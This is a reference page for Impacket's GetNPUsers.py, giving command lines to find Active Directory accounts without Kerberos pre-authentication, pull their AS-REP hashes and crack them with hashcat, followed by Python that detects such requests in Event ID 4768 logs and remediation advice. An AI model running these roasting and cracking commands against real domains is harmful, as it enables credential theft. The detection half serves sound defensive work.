
GetNPUsers

Description

This script attempts to list the users that have the 'Do not require Kerberos preauthentication' property set (UF_DONT_REQUIRE_PREAUTH) and to get TGTs for them. For users configured this way, output in John the Ripper format is generated so you can send it for cracking.

Usage

GetNPUsers.py -dc-ip 10.10.10.10 -no-pass -request -usersfile users.txt qu35t.pw/
GetNPUsers.py -dc-ip 10.10.10.10 qu35t.pw/admin:password
GetNPUsers.py -dc-ip 10.10.10.10 qu35t.pw/admin:password -request

Output

GetNPUsers.py -format john -dc-ip 10.10.10.10 -no-pass -usersfile users.txt qu35t.pw/
GetNPUsers.py -format hashcat -dc-ip 10.10.10.10 -no-pass -usersfile users.txt qu35t.pw/ 

Authentication

GetNPUsers.py -hashes LMHASH:NTHASH -dc-ip 10.10.10.10 qu35t.pw/svc_user
GetNPUsers.py qu35t.pw/svc_user -no-pass -dc-ip 10.10.10.10
export KRB5CCNAME=svc_user.ccache
GetNPUsers.py -k -no-pass -dc-host dc1.qu35t.pw qu35t.pw/svc_user

Hashcat Cracking

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
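
On the defensive side, a TGT issued without pre-authentication is logged on the domain controller as Event ID 4768 with Pre-Authentication Type 0. The following Python is an added example, not part of the original page or of Impacket: it assumes 4768 events exported to CSV under their event field names, and the sample rows are constructed.

```python
import csv
import io
from collections import defaultdict

# Constructed sample: Event ID 4768 (TGT requested) records exported as CSV.
# Column names follow the 4768 event fields; every value here is made up.
SAMPLE_4768 = """\
TimeCreated,TargetUserName,IpAddress,Status,TicketEncryptionType,PreAuthType
2024-05-01T10:00:01Z,alice,::ffff:10.10.10.50,0x0,0x12,2
2024-05-01T10:02:11Z,svc_backup,::ffff:10.10.10.77,0x0,0x17,0
2024-05-01T10:02:12Z,svc_sql,::ffff:10.10.10.77,0x0,0x17,0
2024-05-01T10:02:13Z,bob,::ffff:10.10.10.77,0x6,0xffffffff,-
2024-05-01T11:30:00Z,svc_legacy,::ffff:10.10.10.20,0x0,0x12,0
"""

RC4_HMAC = 0x17  # etype 23, the AS-REP type hashcat mode 18200 works on


def find_no_preauth_tgts(csv_text):
    """Return successful 4768 events where the TGT was issued without pre-auth."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        issued = int(row["Status"], 16) == 0
        # Failed requests carry "-" as PreAuthType, so check Status first.
        if issued and int(row["PreAuthType"]) == 0:
            row["rc4"] = int(row["TicketEncryptionType"], 16) == RC4_HMAC
            hits.append(row)
    return hits


def summarize_by_source(hits, min_accounts=2):
    """Group hits per source IP; flag sources that touched several accounts."""
    accounts = defaultdict(set)
    for h in hits:
        # 4768 records IPv4 clients in IPv4-mapped IPv6 form.
        accounts[h["IpAddress"].replace("::ffff:", "")].add(h["TargetUserName"])
    return {
        ip: {"accounts": sorted(users), "sweep": len(users) >= min_accounts}
        for ip, users in accounts.items()
    }


if __name__ == "__main__":
    hits = find_no_preauth_tgts(SAMPLE_4768)
    for ip, info in summarize_by_source(hits).items():
        label = "multi-account sweep" if info["sweep"] else "single account"
        print(f"{ip}: {label}: {', '.join(info['accounts'])}")
```

Every account this reports has UF_DONT_REQUIRE_PREAUTH set; re-enable pre-authentication on it unless a legacy client genuinely depends on the setting, and give any that must keep it a long random password.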
